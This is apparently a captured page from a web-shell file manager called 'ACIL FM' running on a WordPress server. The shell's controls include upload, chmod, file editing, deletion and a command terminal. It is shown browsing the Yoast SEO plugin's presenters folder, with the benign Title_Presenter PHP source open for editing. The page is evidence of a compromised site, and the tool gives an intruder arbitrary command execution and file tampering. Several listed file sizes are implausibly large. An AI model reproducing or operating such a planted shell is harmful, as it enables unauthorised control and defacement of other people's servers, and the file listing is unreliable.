ACIL FM
Dark
Refresh
Current DIR:
/home/mhhtmff/www/site/wp-content/plugins/wordpress-seo/src/presenters
/
home
mhhtmff
www
site
wp-content
plugins
wordpress-seo
src
presenters
Upload
Zip Selected
Delete Selected
Pilih semua
Nama
Ukuran
Permission
Aksi
admin
-
chmod
Open
Rename
Delete
debug
-
chmod
Open
Rename
Delete
open-graph
-
chmod
Open
Rename
Delete
slack
-
chmod
Open
Rename
Delete
twitter
-
chmod
Open
Rename
Delete
webmaster
-
chmod
Open
Rename
Delete
abstract-indexable-presenter.php
1.55 MB
chmod
View
DL
Edit
Rename
Delete
abstract-indexable-tag-presenter.php
1.72 MB
chmod
View
DL
Edit
Rename
Delete
abstract-presenter.php
377 B
chmod
View
DL
Edit
Rename
Delete
breadcrumbs-presenter.php
6.48 MB
chmod
View
DL
Edit
Rename
Delete
canonical-presenter.php
1.11 MB
chmod
View
DL
Edit
Rename
Delete
meta-author-presenter.php
1.34 MB
chmod
View
DL
Edit
Rename
Delete
meta-description-presenter.php
1.82 MB
chmod
View
DL
Edit
Rename
Delete
rel-next-presenter.php
1.61 MB
chmod
View
DL
Edit
Rename
Delete
rel-prev-presenter.php
1.59 MB
chmod
View
DL
Edit
Rename
Delete
robots-presenter.php
711 B
chmod
View
DL
Edit
Rename
Delete
robots-txt-presenter.php
4.14 MB
chmod
View
DL
Edit
Rename
Delete
schema-presenter.php
1.41 MB
chmod
View
DL
Edit
Rename
Delete
score-icon-presenter.php
944 B
chmod
View
DL
Edit
Rename
Delete
title-presenter.php
1.7 MB
chmod
View
DL
Edit
Rename
Delete
url-list-presenter.php
983 B
chmod
View
DL
Edit
Rename
Delete
Edit file: /home/mhhtmff/www/site/wp-content/plugins/wordpress-seo/src/presenters/title-presenter.php
<?php namespace Yoast\WP\SEO\Presenters; use Yoast\WP\SEO\Presentations\Indexable_Presentation; /** * Presenter class for the document title. */ class Title_Presenter extends Abstract_Indexable_Tag_Presenter { /** * The tag key name. * * @var string */ protected $key = 'title'; /** * The tag format including placeholders. * * @var string */ protected $tag_format = '<title>%s</title>'; /** * The method of escaping to use. * * @var string */ protected $escaping = 'html'; /** * Gets the raw value of a presentation. * * @return string The raw value. */ public function get() { // This ensures backwards compatibility with other plugins using this filter as well. \add_filter( 'pre_get_document_title', [ $this, 'get_title' ], 15 ); $title = \wp_get_document_title(); \remove_filter( 'pre_get_document_title', [ $this, 'get_title' ], 15 ); return $title; } /** * Returns a tag in the head. * * @return string The tag. */ public function present() { $value = $this->get(); if ( \is_string( $value ) && $value !== '' ) { return \sprintf( $this->tag_format, $this->escape_value( $value ) ); } return ''; } /** * Returns the presentation title. * * @return string The title. */ public function get_title() { $title = $this->replace_vars( $this->presentation->title ); /** * Filter: 'wpseo_title' - Allow changing the Yoast SEO generated title. * * @api string $title The title. * * @param Indexable_Presentation $presentation The presentation of an indexable. */ $title = \apply_filters( 'wpseo_title', $title, $this->presentation ); $title = $this->helpers->string->strip_all_tags( $title ); return \trim( $title ); } }
Simpan
Batal
Isi Zip:
Unzip
Create
Buat Folder
Buat File
Terminal / Execute
Run
Chmod Bulk
All File
All Folder
All File dan Folder
Apply